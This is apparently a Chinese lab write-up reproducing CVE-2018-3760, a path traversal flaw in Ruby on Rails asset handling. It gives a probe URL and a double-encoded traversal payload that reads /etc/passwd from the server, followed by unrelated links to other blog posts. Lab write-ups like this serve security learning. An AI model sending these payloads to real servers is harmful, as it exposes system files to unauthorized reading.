墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
阿sir19812 小时前
ZYNQ 自定义IP
服务器·网络·tcp/ip
我不只是切图仔13 小时前
我只是想给网站加个注册验证码,咋就那么难!
前端·后端
专注VB编程开发20年13 小时前
CSS 的命名方式像是 PowerShell 的动词-名词结构,缺乏面向对象的层级关系
开发语言·后端·rust
野犬寒鸦13 小时前
力扣hot100:相交链表与反转链表详细思路讲解(160,206)
java·数据结构·后端·算法·leetcode
星马梦缘13 小时前
计算机网络4 第四章 网络层——网络间的通信问题(省际之间如何规划信件运输路线)
网络·计算机网络·路由·ip地址·子网掩码·icmp·ipv4/ipv6
爱吃烤鸡翅的酸菜鱼13 小时前
【Spring】原理:Bean的作用域与生命周期
后端·spring
JohnYan13 小时前
工作笔记 - 微信消息发送和处理
javascript·后端·微信
该用户已不存在13 小时前
macOS是开发的终极进化版吗?
前端·后端
计算机毕业设计木哥14 小时前
计算机毕设选题:基于Python+Django的B站数据分析系统的设计与实现【源码+文档+调试】
java·开发语言·后端·python·spark·django·课程设计
歪歪10014 小时前
qt creator新手入门以及结合sql server数据库开发
c语言·开发语言·后端·qt·数据库开发